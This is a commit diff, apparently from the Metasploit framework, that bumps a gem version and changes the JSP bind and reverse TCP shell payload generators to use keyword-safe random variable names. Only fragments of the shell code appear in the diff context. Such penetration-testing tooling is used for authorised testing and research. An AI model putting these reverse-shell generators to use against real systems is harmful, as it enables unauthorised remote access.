Ensure generated JSP variable names aren't Java keywords
This commit is contained in:
parent
0e2b048d56
commit
79c8f2a0f4
|
@ -357,7 +357,7 @@ GEM
|
|||
rex-random_identifier
|
||||
rex-text
|
||||
ruby-rc4
|
||||
rex-random_identifier (0.1.5)
|
||||
rex-random_identifier (0.1.7)
|
||||
rex-text
|
||||
rex-registry (0.1.4)
|
||||
rex-rop_builder (0.1.4)
|
||||
|
|
|
@ -21,11 +21,12 @@ module Msf::Payload::JSP
|
|||
# @return [String] jsp code that executes bind TCP payload
|
||||
def jsp_bind_tcp
|
||||
# Modified from: http://www.security.org.sg/code/jspreverse.html
|
||||
generator = Rex::RandomIdentifier::Generator.new({ language: :jsp })
|
||||
|
||||
var_is = Rex::Text.rand_text_alpha_lower(2)
|
||||
var_os = Rex::Text.rand_text_alpha_lower(2)
|
||||
var_in = Rex::Text.rand_text_alpha_lower(2)
|
||||
var_out = Rex::Text.rand_text_alpha_lower(3)
|
||||
var_is = generator.generate(2)
|
||||
var_os = generator.generate(2)
|
||||
var_in = generator.generate(2)
|
||||
var_out = generator.generate(3)
|
||||
|
||||
jsp = <<-EOS
|
||||
<%@page import="java.lang.*"%>
|
||||
|
@ -92,11 +93,12 @@ module Msf::Payload::JSP
|
|||
# @return [String] jsp code that executes reverse TCP payload
|
||||
def jsp_reverse_tcp
|
||||
# JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
|
||||
generator = Rex::RandomIdentifier::Generator.new({ language: :jsp })
|
||||
|
||||
var_is = Rex::Text.rand_text_alpha_lower(2)
|
||||
var_os = Rex::Text.rand_text_alpha_lower(2)
|
||||
var_in = Rex::Text.rand_text_alpha_lower(2)
|
||||
var_out = Rex::Text.rand_text_alpha_lower(3)
|
||||
var_is = generator.generate(2)
|
||||
var_os = generator.generate(2)
|
||||
var_in = generator.generate(2)
|
||||
var_out = generator.generate(3)
|
||||
|
||||
jsp = <<-EOS
|
||||
<%@page import="java.lang.*"%>
|
||||
|
@ -205,5 +207,4 @@ if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
|
|||
|
||||
jsp
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue